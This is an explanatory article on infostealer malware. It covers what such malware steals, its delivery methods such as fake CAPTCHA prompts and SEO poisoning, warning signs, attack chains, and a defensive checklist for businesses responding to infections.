Infostealer malware has become one of the defining cyber threats of the current moment. It is no longer just a technical nuisance or a low-level malware problem affecting careless users who download the wrong file. It has become a foundational part of the modern cybercrime economy. Infostealers are now routinely used to steal usernames, passwords, browser session cookies, authentication tokens, financial data, crypto wallet information, and other sensitive artifacts that can later be sold, reused, or weaponized in larger attacks. Microsoft’s 2025 Digital Defense Report describes infostealers as a major driver of credential and token theft at scale, while Mandiant reported in 2025 that stolen credentials had become the second most common initial infection vector in its investigations, accounting for 16% of cases.
That helps explain why infostealers are in the media spotlight right now. Security researchers, government agencies, and law enforcement have all been drawing attention to them because they are no longer isolated tools used in one-off cyber incidents. They are feeding a much larger access-for-sale market. In May 2025, Microsoft said it identified more than 394,000 Windows devices globally infected by Lumma malware in just a two-month period, leading to a major takedown effort with law enforcement and industry partners. More recently, Microsoft documented fresh 2026 campaigns using SEO poisoning and fake VPN clients to steal credentials from users searching for legitimate enterprise software.
What infostealer malware is
An infostealer is malware designed primarily to collect valuable information from an infected system and send it back to the attacker. Unlike ransomware, which loudly announces itself by encrypting files and demanding payment, an infostealer often tries to remain quiet. Its job is usually to harvest data, exfiltrate it quickly, and leave behind as little obvious disruption as possible. Microsoft and CISA both describe modern stealers as capable of collecting credentials, tokens, browser data, financial information, crypto wallet data, and other sensitive artifacts from infected endpoints.
That theft can include saved passwords in browsers, autofill data, stored cookies, login sessions, desktop wallet files, email-related credentials, VPN credentials, messaging application data, and system context that helps attackers understand what kind of device they have compromised. Some modern families can also pull data from developer environments, keychains, or application-specific stores. Microsoft’s 2026 research on cross-platform infostealers emphasizes that these threats are no longer limited to traditional Windows credential theft and are increasingly broad, flexible collection tools operating across different operating systems and delivery channels.
Why infostealers matter so much now
The danger of an infostealer is not confined to the infected laptop or workstation. That is the critical point many organizations still miss. If a user’s browser contains saved passwords, active SaaS sessions, VPN access, cloud admin sessions, finance portal access, or business email sessions, one infection can turn into many compromises. Microsoft’s 2025 defense reporting explicitly warns that organizations experiencing an infostealer infection are at high risk of future breaches because the stolen data can later be used for ransomware, data theft, fraud, and extortion.
This is why infostealers have become so useful to criminal groups. One actor can spread the malware, another can package the stolen data into logs, another can sell those logs, and still another can buy the credentials or tokens to conduct follow-on attacks. Huntress reported that infostealers accounted for 24% of incidents in its 2025 Cyber Threat Report, illustrating how common and operationally important they have become in the wider threat landscape.
How infostealers are delivered
Many people still think malware arrives mainly through suspicious attachments and badly written phishing emails. That still happens, but the delivery landscape has become much more polished and deceptive. Microsoft’s 2025 and 2026 reporting shows infostealers being delivered through malvertising, SEO poisoning, fake software installers, malicious CAPTCHA prompts, phishing messages, fake VPN downloads, cracked software, and redirection chains that abuse trusted platforms like GitHub, Dropbox, and other legitimate services.
The LummaC2 advisory from FBI and CISA is especially useful here because it shows how mundane and effective these tactics can be. According to the advisory, threat actors used spearphishing links and attachments, and in some cases used fake CAPTCHA pages that instructed victims to open the Windows Run dialog, paste malicious clipboard content, and launch a Base64-encoded PowerShell command. In other words, many infostealer infections now rely on convincing users to participate in their own compromise.
This is one reason infostealers are so dangerous in ordinary business environments. The attacker does not always need a sophisticated zero-day exploit. Often, a believable lure, a poisoned search result, a fake login page, or a trojanized download is enough.
What attackers are really stealing
The word “credential” can make the threat sound narrower than it really is. Modern infostealers are not just collecting passwords. They are increasingly going after session cookies and authentication tokens as well. That matters because a stolen cookie or token can sometimes allow an attacker to impersonate a logged-in user without needing the password again. Microsoft’s reporting consistently emphasizes the theft of credentials, browser session tokens, and system context data, which is part of why infostealers have become so valuable to follow-on attackers.
This helps explain the shift from “malware incident” to “identity incident.” If the malware steals an active browser session tied to email, cloud storage, a CRM, a payroll portal, or a privileged admin console, the problem is no longer limited to the infected device. It becomes an access control problem that may extend across the whole organization. Microsoft’s reporting on token theft and cookie abuse in adjacent campaigns shows how attackers can turn session theft into business email compromise, financial fraud, and other downstream abuse.
Signs of an infostealer infection
Infostealers are often designed to be quiet, so there is not always a dramatic pop-up or a visible crash that announces the infection. In many cases, the most obvious warning signs appear after the malware has already done its work. One common indicator is unexplained account activity: forced logouts, password reset emails you did not request, MFA prompts you did not initiate, strange messages sent from your email or chat accounts, or new sign-ins from unfamiliar devices or locations. These downstream effects are consistent with what Microsoft and Mandiant describe as the growing use of stolen credentials and tokens for initial access and later-stage compromise.
Another warning sign is suspicious behavior tied to software installation or browsing activity. A user may have downloaded a fake installer, clicked through a malicious ad chain, visited a poisoned search result, interacted with a fake CAPTCHA prompt, or installed software that looked legitimate but behaved oddly. Microsoft’s research on Lumma, fake VPN clients, and large-scale malvertising campaigns all point to these deceptive delivery paths as common real-world infection triggers.
On the endpoint itself, defenders may see suspicious PowerShell usage, unusual child processes launched from browsers or document viewers, new scheduled tasks or Run key persistence, odd outbound connections to unfamiliar domains, browser data access at unusual times, or Python interpreters and signed binaries being abused in ways that do not fit the user’s normal workflow. Microsoft’s 2026 reporting on Python-based stealers notes persistence via registry Run keys or scheduled tasks, use of obfuscated scripts, malware masquerading as trusted processes, and exfiltration via legitimate platforms like Telegram.
There may also be subtle business-side signs rather than overt technical ones. Finance may see unusual login activity in banking or payment systems. Help desks may receive a sudden spike in “I got logged out” or “my MFA looks strange” complaints. Leadership may notice suspicious email forwarding rules, odd cloud access patterns, or vendors reporting strange messages from your domain. In an infostealer case, those soft warning signals often matter just as much as antivirus alerts because the attacker’s real objective is usually unauthorized access, not immediate disruption. This conclusion is supported by Microsoft’s repeated warning that infostealer infections often serve as a precursor to future breach activity.
Real-world attack chain examples
A useful way to understand infostealers is to stop thinking of them as standalone malware and start thinking of them as an early stage in a larger attack chain.
In one documented pattern, a user searches online for legitimate software, such as a VPN client or business tool. Because of SEO poisoning, they land on an attacker-controlled site that offers what appears to be the desired software. The user downloads a ZIP file or installer, runs it, and unknowingly launches a trojanized payload. Microsoft documented exactly this type of 2026 campaign, where fake VPN clients were distributed through poisoned search results and used to harvest VPN credentials. The initial “software download” may look mundane, but the real goal is to steal access that can later be reused.
In another pattern, a user visits an illegal streaming site or another risky web property and encounters malicious advertising redirects. Microsoft reported a large-scale 2025 malvertising campaign that impacted nearly one million devices globally. Victims were redirected through intermediary infrastructure to repositories on GitHub and other platforms that delivered multi-stage malware. From there, the payload chain collected system data, established a foothold, and exfiltrated information. This is a powerful example because it shows how quickly web browsing behavior can turn into credential theft at large scale.
A third pattern begins with phishing. The user receives a plausible email, clicks a link or opens an attachment, and executes the malware. In Lumma-related activity described by FBI and CISA, threat actors also used fake CAPTCHA instructions that convinced users to paste malicious content into the Run dialog, launching PowerShell-based execution. Once the malware runs, it collects credentials, browser data, and other artifacts. Those stolen artifacts may then be sold or handed off to another actor, who later uses them for cloud access, BEC, or ransomware staging.
A fourth pattern is the cross-platform expansion now being reported more openly. Microsoft’s February 2026 research described infostealer activity expanding beyond classic Windows delivery models into macOS and Python-based campaigns, including the abuse of trusted applications and utilities such as PDF tools and messaging platforms. That matters because many organizations still defend as though infostealers are mainly a Windows browser-password problem, when in reality the threat surface now includes mixed operating systems, scripting languages, consumer apps, and trusted services.
Why infostealers often lead to bigger incidents
One of the biggest misconceptions in incident response is the idea that if the malware is removed, the danger is over. With an infostealer, that is often false. Once passwords, cookies, and tokens have been exfiltrated, reimaging the machine may remove the malware but it does not invalidate the stolen access. Microsoft’s defense reporting is explicit on this point: organizations that experience an infostealer infection are at high risk of later breaches.
That later breach might take several forms. It could be a business email compromise event using a hijacked mailbox. It could be unauthorized cloud access through stolen sessions. It could be fraud against customers or vendors. It could be an access broker selling the foothold onward to a ransomware affiliate. Microsoft’s Lumma reporting specifically noted that ransomware actors have used the stealer in campaigns, reinforcing the point that the infostealer is often the beginning of a broader attack path, not the end.
What a business should do when it suspects an infostealer incident
The first priority is containment of the affected device. That means isolating the host, preserving relevant telemetry where possible, and preventing further outbound communication. But containment alone is not enough. Because infostealers target identity material, the response must immediately expand beyond the device and into the user’s account footprint. That broader mindset is consistent with Microsoft’s framing of infostealer infections as future-breach risks and with Mandiant’s findings on the role of stolen credentials in initial access.
The second priority is credential and session response. Businesses should identify every meaningful account used from the infected system, especially email, VPN, cloud services, finance platforms, password managers, developer platforms, collaboration tools, and privileged administrative consoles. Password resets should be accompanied by session revocation and forced sign-outs wherever possible, since stolen cookies and tokens may otherwise remain usable. That follows directly from Microsoft’s emphasis on token and session theft as part of the infostealer problem.
The third priority is hunting for downstream misuse. Security teams should review sign-in logs, MFA events, impossible travel alerts, suspicious OAuth grants, newly registered devices, mailbox rule changes, unusual cloud console activity, and suspicious administrative actions. The point is not merely to confirm that malware ran. The point is to determine whether stolen access has already been used elsewhere in the environment. Microsoft’s reporting on identity-centric attacks and stolen credentials strongly supports this approach.
The fourth priority is scoping and communication. If the infected user had access to sensitive data, customer systems, financial workflows, regulated environments, or critical infrastructure, the organization should assess whether notification, legal review, or regulator engagement may be needed. FBI and CISA’s LummaC2 advisory also encourages organizations to document the scope and status of infection, estimated loss, dates, and indicators when reporting.
A practical business checklist for responding to infostealer incidents
A useful checklist starts with one basic principle: treat the case as both a malware incident and an identity compromise.
First, isolate the suspected endpoint and preserve relevant logs, alerts, and telemetry. Second, determine what the user accessed from that device, including business email, VPN, cloud platforms, admin portals, developer tools, password managers, and financial systems. Third, reset passwords for exposed accounts and revoke active sessions and tokens wherever feasible. Fourth, review MFA settings, recovery options, forwarding rules, OAuth consents, and device registrations for suspicious changes. Fifth, hunt across identity and cloud logs for unusual sign-ins, geographic anomalies, impossible travel, mass downloads, and abnormal privilege use. Sixth, assess whether lateral movement, data access, or follow-on malware occurred after the initial infection. Seventh, reimage or rebuild the device rather than relying on a narrow cleanup. Eighth, review the infection path so the same method cannot be reused, whether that path was phishing, malvertising, fake software, or poisoned search results. Ninth, brief leadership in plain language that the real risk is stolen access, not just malware execution. Tenth, document lessons learned and tune controls around software sourcing, browser storage, user awareness, endpoint telemetry, and identity monitoring. This response model aligns with Microsoft’s warning about future breaches after infostealer infections and with FBI/CISA guidance to test and tune defenses against the observed ATT&CK techniques.
How businesses can reduce the risk before an incident happens
The most effective defenses are layered. Businesses should reduce unnecessary password storage in browsers, use phishing-resistant MFA where possible, restrict the execution of untrusted software, improve endpoint visibility, and watch identity logs as closely as endpoint alerts. Security awareness also needs to evolve. Employees should be warned not only about attachments and suspicious links, but also about fake software downloads, poisoned search results, malicious ads, fake CAPTCHA prompts, and trojanized installers. Microsoft’s 2025 and 2026 research makes clear that those delivery paths are now central to the problem.
Organizations should also revisit the old habit of treating credential theft and endpoint malware as separate disciplines. Infostealers bridge those worlds. They are endpoint threats that become identity threats almost immediately. That means security operations, identity teams, IT, and incident response need to work from the same playbook. The businesses that still respond as though “malware cleanup” ends the incident are the ones most likely to be surprised later by account takeover, fraud, or ransomware.
Final thoughts
Infostealer malware is getting so much attention because it represents something larger than one malware family or one campaign. It reflects a mature cybercriminal model built around stealing access, packaging that access, and turning it into money through fraud, resale, extortion, and follow-on compromise. It is quiet, scalable, and efficient. It often does not announce itself until the stolen credentials or sessions are used later in a different attack. That is exactly why it deserves executive attention, business planning, and a more serious response than many organizations have given it in the past.